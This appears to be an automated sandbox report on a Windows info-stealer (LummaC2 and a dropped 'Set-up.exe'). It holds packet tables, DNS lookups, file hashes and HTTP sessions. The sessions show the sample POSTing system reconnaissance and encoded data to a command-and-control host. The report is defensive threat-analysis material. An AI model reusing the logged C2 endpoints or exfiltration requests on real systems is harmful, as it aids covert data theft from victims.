Dec 27, 2024 14:53:42.670260906 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.670305014 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.670452118 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.670499086 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.670552015 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.670595884 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.670711994 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.670743942 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.670897007 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.670928001 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671045065 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671072960 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671109915 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671158075 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671216965 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671266079 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671406984 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671433926 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671483040 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671509027 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671598911 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671727896 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671756983 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671812057 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671839952 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671890020 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671940088 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.671967983 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672017097 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672068119 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672188044 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672214985 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672246933 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672324896 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672352076 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672465086 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672492981 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672524929 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672591925 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672700882 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672775030 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672806978 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.672898054 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.673032999 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.673059940 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.673094034 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.673146009 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.673448086 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.673475027 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.675950050 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.676071882 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.676106930 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.676212072 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.676239967 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.676273108 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.676321983 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.676440954 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:42.676491976 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:44.830096006 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:44.830308914 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:44.830377102 CET	49709	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:44.949912071 CET	80	49709	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:44.986546993 CET	49712	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:45.107016087 CET	80	49712	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:45.107142925 CET	49712	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:45.107430935 CET	49712	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:45.226862907 CET	80	49712	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:46.611211061 CET	80	49712	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:46.611520052 CET	49712	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:46.611884117 CET	80	49712	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:46.611953020 CET	49712	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:46.731018066 CET	80	49712	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:46.755770922 CET	49713	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:46.875237942 CET	80	49713	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:46.875355005 CET	49713	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:46.875760078 CET	49713	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:46.995239019 CET	80	49713	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:48.403153896 CET	80	49713	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:48.403173923 CET	80	49713	185.121.15.192	192.168.2.8
Dec 27, 2024 14:53:48.403300047 CET	49713	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:48.403486967 CET	49713	80	192.168.2.8	185.121.15.192
Dec 27, 2024 14:53:48.522968054 CET	80	49713	185.121.15.192	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 14:53:26.095473051 CET	52696	53	192.168.2.8	1.1.1.1
Dec 27, 2024 14:53:26.095633030 CET	52696	53	192.168.2.8	1.1.1.1
Dec 27, 2024 14:53:26.233465910 CET	53	52696	1.1.1.1	192.168.2.8
Dec 27, 2024 14:53:26.233486891 CET	53	52696	1.1.1.1	192.168.2.8
Dec 27, 2024 14:53:40.776498079 CET	55972	53	192.168.2.8	1.1.1.1
Dec 27, 2024 14:53:40.776590109 CET	55972	53	192.168.2.8	1.1.1.1
Dec 27, 2024 14:53:40.914331913 CET	53	55972	1.1.1.1	192.168.2.8
Dec 27, 2024 14:53:40.914397001 CET	53	55972	1.1.1.1	192.168.2.8
Dec 27, 2024 14:53:44.848870039 CET	58961	53	192.168.2.8	1.1.1.1
Dec 27, 2024 14:53:44.848974943 CET	58961	53	192.168.2.8	1.1.1.1
Dec 27, 2024 14:53:44.985781908 CET	53	58961	1.1.1.1	192.168.2.8
Dec 27, 2024 14:53:44.985805988 CET	53	58961	1.1.1.1	192.168.2.8
Dec 27, 2024 14:53:46.617067099 CET	58963	53	192.168.2.8	1.1.1.1
Dec 27, 2024 14:53:46.617110968 CET	58963	53	192.168.2.8	1.1.1.1
Dec 27, 2024 14:53:46.754897118 CET	53	58963	1.1.1.1	192.168.2.8
Dec 27, 2024 14:53:46.754911900 CET	53	58963	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 14:53:26.095473051 CET	192.168.2.8	1.1.1.1	0xb6ee	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:26.095633030 CET	192.168.2.8	1.1.1.1	0xb926	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 27, 2024 14:53:40.776498079 CET	192.168.2.8	1.1.1.1	0x9be	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:40.776590109 CET	192.168.2.8	1.1.1.1	0xd335	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 14:53:44.848870039 CET	192.168.2.8	1.1.1.1	0x385d	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:44.848974943 CET	192.168.2.8	1.1.1.1	0x8ae8	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 14:53:46.617067099 CET	192.168.2.8	1.1.1.1	0x844	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:46.617110968 CET	192.168.2.8	1.1.1.1	0x55c6	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 14:53:26.233465910 CET	1.1.1.1	192.168.2.8	0xb6ee	No error (0)	httpbin.org	34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:26.233465910 CET	1.1.1.1	192.168.2.8	0xb6ee	No error (0)	httpbin.org	3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:40.914397001 CET	1.1.1.1	192.168.2.8	0x9be	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:44.985805988 CET	1.1.1.1	192.168.2.8	0x385d	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:46.754911900 CET	1.1.1.1	192.168.2.8	0x844	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.fortth14ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49709	185.121.15.192	80	6964	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 14:53:41.049412012 CET	12360	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 534468 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 33 31 38 37 30 33 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8528974808643187031", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
Dec 27, 2024 14:53:41.169086933 CET	4944	OUT	Data Raw: 49 41 41 68 45 42 41 78 45 42 5c 2f 38 51 41 48 77 41 41 41 51 55 42 41 51 45 42 41 51 45 41 41 41 41 41 41 41 41 41 41 41 45 43 41 77 51 46 42 67 63 49 43 51 6f 4c 5c 2f 38 51 41 74 52 41 41 41 67 45 44 41 77 49 45 41 77 55 46 42 41 51 41 41 41 Data Ascii: IAAhEBAxEB\/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL\/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW
Dec 27, 2024 14:53:41.169133902 CET	2472	OUT	Data Raw: 7a 63 32 7a 2b 4d 5c 2f 38 38 7a 5c 2f 41 4b 37 50 2b 66 58 33 71 47 70 6d 33 79 46 34 2b 30 6e 31 5c 2f 63 5c 2f 54 72 5c 2f 6e 74 7a 54 4f 75 5c 2f 77 43 53 54 66 38 41 38 38 34 5c 2f 54 6e 5c 2f 4f 65 4b 79 4f 69 6e 31 2b 58 36 6c 59 37 50 4d Data Ascii: zc2z+M\/88z\/AK7P+fX3qGpm3yF4+0n1\/c\/Tr\/ntzTOu\/wCSTf8A884\/Tn\/OeKyOin1+X6lY7PMdx\/2zkjHPv\/n6fSmxb5PJ\/gT\/AKZ8f5z\/AJ4qVsyb0\/8AIf8Aj9f88VDj+D+PyvKl\/df8u\/8Anp6YroNCHzN3+2JIv3v2j\/P+HtQsc+3ePn8z91KP+W\/+eO386fJsIRP445efL\/L0\/wA\/jT5M7Xd
Dec 27, 2024 14:53:41.169173002 CET	4944	OUT	Data Raw: 6d 6d 56 78 63 6a 38 76 36 2b 52 5c 2f 6b 2b 66 72 70 2b 78 42 34 6a 75 35 5c 2f 67 76 71 4f 6a 4c 63 4d 31 70 70 5c 2f 69 5c 2f 56 39 50 75 39 4d 6e 32 33 4f 6e 33 74 74 4e 61 36 58 71 30 61 33 2b 6d 58 4a 6e 73 62 32 32 65 62 55 4c 6c 52 44 64 Data Ascii: mmVxcj8v6+R\/k+frp+xB4ju5\/gvqOjLcM1pp\/i\/V9Pu9Mn23On3ttNa6Xq0a3+mXJnsb22ebULlRDdWzwOyS5iY73f33Xvhb8NPEvmSXvhZdEvpN7tqXg26XQGklbiPztGlttS8MpaxdTbaToujSy4wbxCS1fBv7G3jrTvCHgv4yahrRuf7J8LQaL4rvBbJHJMlgtrrEWqXESSyQRs1tBp9vK8ZnEsyDZbRyyjY\/nHij43
Dec 27, 2024 14:53:41.169193983 CET	2472	OUT	Data Raw: 59 37 59 6f 4e 4b 66 58 35 45 4e 51 38 5c 2f 63 39 5c 2f 38 5c 2f 68 33 5c 2f 57 70 71 5a 74 2b 66 66 37 59 5c 2f 7a 5c 2f 4f 67 30 49 71 72 31 59 6f 6f 4f 67 72 30 78 2b 6e 34 5c 2f 77 42 44 54 36 52 67 57 5c 2f 50 4e 42 30 45 48 38 57 33 76 2b Data Ascii: Y7YoNKfX5ENQ8\/c9\/8\/h3\/WpqZt+ff7Y\/z\/Og0Iqr1YooOgr0x+n4\/wBDT6RgW\/PNB0EH8W3v+nXFRbD7f5\/CpX\/1h\/3R\/SigCvUfl+\/6f\/Xqy\/T8f6GoqDqpdP8AD\/kVX+6fw\/mKhb5c57elXPL9\/wBP\/r1HQbFemP0\/H+hp7L2I\/wA+oqOTt+P9KDoI6j8v3\/T\/AOvUlFBrDb5\/oiqy7vwqH\
Dec 27, 2024 14:53:41.169259071 CET	2472	OUT	Data Raw: 2b 5c 2f 5c 2f 77 41 5c 2f 55 5c 2f 72 54 50 4d 2b 35 30 5c 2f 37 2b 39 66 38 41 50 38 6a 55 2b 31 5c 2f 75 4f 66 6e 38 33 39 37 37 38 64 36 71 37 58 6b 55 4a 2b 37 32 79 66 38 41 4c 50 79 76 49 50 50 36 38 38 2b 33 4e 55 41 2b 54 39 32 79 5a 38 Data Ascii: +\/\/wA\/U\/rTPM+50\/7+9f8AP8jU+1\/uOfn839778d6q7XkUJ+72yf8ALPyvIPP688+3NUA+T92yZ8xHt8yxRyy46Dv1o8t2j+5vxF5sUfm\/v\/s49uB\/9f8AQO2Pej\/88vK\/rj\/PNHzn7iSf63zbX0\/LP+e1AFby1b+Dajy\/uv8Apt\/n3p8n7zY7pG\/l\/uv9b\/y7\/wDLpjvU3kptR3G9Jf8Aln5v7j\/r6
Dec 27, 2024 14:53:41.169373035 CET	1236	OUT	Data Raw: 57 34 36 70 6c 4e 66 46 31 4d 46 6d 46 50 43 30 73 64 43 68 4f 76 50 4c 38 64 47 6b 70 53 77 74 5a 51 5c 2f 37 4a 4d 30 38 55 50 43 5c 2f 67 47 68 6c 65 4d 34 34 38 53 4f 41 65 44 4d 4c 78 46 68 71 74 58 68 5c 2f 45 63 56 38 59 63 50 63 4f 30 63 Data Ascii: W46plNfF1MFmFPC0sdChOvPL8dGkpSwtZQ\/7JM08UPC\/gGhleM448SOAeDMLxFhqtXh\/EcV8YcPcO0c9w+HWEq4qvk1XOMxwdPM6OGpY7A1MRVwUq8KMMfg5VJKOJouf6B6M\/EZOT0x69Dn+VfgX\/wUo8CeGPBP7RUVz4Y0xdNPjrwNpnjvxFHE8jQ3XifVfE3i7TNT1GKJmK276hHotpd3ccWEm1CW7vCPNupCf0z0v9u
Dec 27, 2024 14:53:41.169395924 CET	6180	OUT	Data Raw: 43 38 50 36 37 5c 2f 38 41 42 48 44 34 62 66 48 5c 2f 41 4f 4b 50 5c 2f 42 4f 7a 78 31 34 66 5c 2f 5a 78 5c 2f 61 56 5c 2f 34 5a 5a 38 62 32 66 37 61 66 69 66 57 4e 56 2b 49 50 5c 2f 43 6d 5c 2f 42 66 78 76 5c 2f 74 6a 77 72 62 5c 2f 41 41 4e 2b Data Ascii: C8P67\/8ABHD4bfH\/AOKP\/BOzx14f\/Zx\/aV\/4ZZ8b2f7afifWNV+IP\/Cm\/Bfxv\/tjwrb\/AAN+GFlfeDf+EU8d32n6Rp\/9oavqGh63\/wAJDbTNqVp\/wj39mwxNbateOn6Xf8OWP+CZ3\/RtX\/mY\/j9\/89Svtb9nv9mn4I\/sq+Bbr4a\/APwLb\/D\/AMF3viLUPFl7pEOt+JfEMl54i1Sz0zTr7VbvVvFuta
Dec 27, 2024 14:53:41.288655043 CET	2472	OUT	Data Raw: 6c 6c 64 62 48 5a 64 6a 63 50 4e 74 57 64 48 47 59 53 56 47 76 52 6b 33 79 32 63 4b 6b 57 33 61 33 51 2b 31 76 44 50 37 61 66 78 61 30 54 54 70 39 4b 31 61 36 6a 38 53 57 45 39 72 4a 62 4d 6c 37 49 49 35 73 4f 68 51 50 39 6f 6e 67 76 32 6a 38 76 Data Ascii: lldbHZdjcPNtWdHGYSVGvRk3y2cKkW3a3Q+1vDP7afxa0TTp9K1a6j8SWE9rJbMl7II5sOhQP9ongv2j8vOVitVtYQBtMZG3b4Z4o+LPjDxa8q3+p3EVjIWxp8czQWgU9FeGAQwTEA7RJJDvxnLZZt3k2galpPinxl8P8AwHoniHwu3iH4l\/EHwX8NPDQv9cig08eI\/Hev2PhvRG1GbT4NVvobBdR1CBryWz0y\/uo7cSPb2d
Dec 27, 2024 14:53:41.288711071 CET	2472	OUT	Data Raw: 77 41 4e 64 56 38 53 61 54 71 58 68 37 77 76 71 75 76 61 7a 6f 2b 75 65 4b 37 32 78 76 62 5c 2f 41 4d 4f 65 48 74 54 38 50 32 46 5c 2f 72 4e 72 71 31 39 76 77 5c 2f 77 41 53 35 46 78 58 6c 36 7a 58 68 33 4d 73 50 6d 32 57 79 71 31 4b 45 4d 62 68 Data Ascii: wANdV8SaTqXh7wvquvazo+ueK72xvb\/AMOeHtT8P2F\/rNrq19vw\/wAS5FxXl6zXh3MsPm2Wyq1KEMbhOeWGqVaVlVhSqShCNX2Um6VV0+aNOtCpQm1WpVYQ\/O+KuD+JuB81nkXFmT4rIs4p0oV6uW472UcXRpVXL2Uq9GnUqSo+1jH2tKNXklVw86OJpxlh69GpUKa\/3T+H8xTq0dGt\/Dd7ofxC8VeKvit8K\/hJ4V+Gu
Dec 27, 2024 14:53:41.288733006 CET	2472	OUT	Data Raw: 54 77 70 6a 63 52 6c 4f 62 34 66 46 59 7a 41 5a 6a 55 78 47 58 34 50 42 31 63 44 67 38 52 58 77 65 49 7a 43 70 58 78 75 4d 77 31 50 44 5a 62 44 48 59 62 45 5a 65 73 78 78 54 6f 59 47 70 6d 4e 43 74 6c 39 4c 45 54 78 6c 4f 64 42 51 65 47 50 46 50 Data Ascii: TwpjcRlOb4fFYzAZjUxGX4PB1cDg8RXweIzCpXxuMw1PDZbDHYbEZesxxToYGpmNCtl9LETxlOdBQeGPFPj\/wCGfxF8AfGL4UeI4\/C3xK+GOrXur+F9Su7KLUdNm\/tLT5tL1XSdVspQyzaZremzTaTqW1Hk\/s28vY4U82VJI\/0ng\/4LS\/8ABQKGCGKTwR+yDdSRRRxvcz+FPjGs9w6IFaeZbb4nW9sssxBkkFvbwQB2I
Dec 27, 2024 14:53:44.830096006 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 13:53:44 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49712	185.121.15.192	80	6964	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 14:53:45.107430935 CET	99	OUT	GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1 Host: home.fortth14ht.top Accept: /
Dec 27, 2024 14:53:46.611211061 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 13:53:46 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49713	185.121.15.192	80	6964	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 14:53:46.875760078 CET	172	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 27, 2024 14:53:48.403153896 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 13:53:48 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	34.226.108.155	443	6964	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:53:28 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-27 13:53:28 UTC	224	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:53:28 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-27 13:53:28 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	08:53:22
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\OAKPYEH4c6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\OAKPYEH4c6.exe"
Imagebase:	0xee0000
File size:	6'224'896 bytes
MD5 hash:	E005BA79C9ED37CF2F37FD4DD51FC287
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:53:24
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\LummaC2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Imagebase:	0xa60000
File size:	299'520 bytes
MD5 hash:	607000C61FCB5A41B8D511B5ED7625D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	08:53:25
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Set-up.exe"
Imagebase:	0xe70000
File size:	6'851'208 bytes
MD5 hash:	2A99036C44C996CEDEB2042D389FE23C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

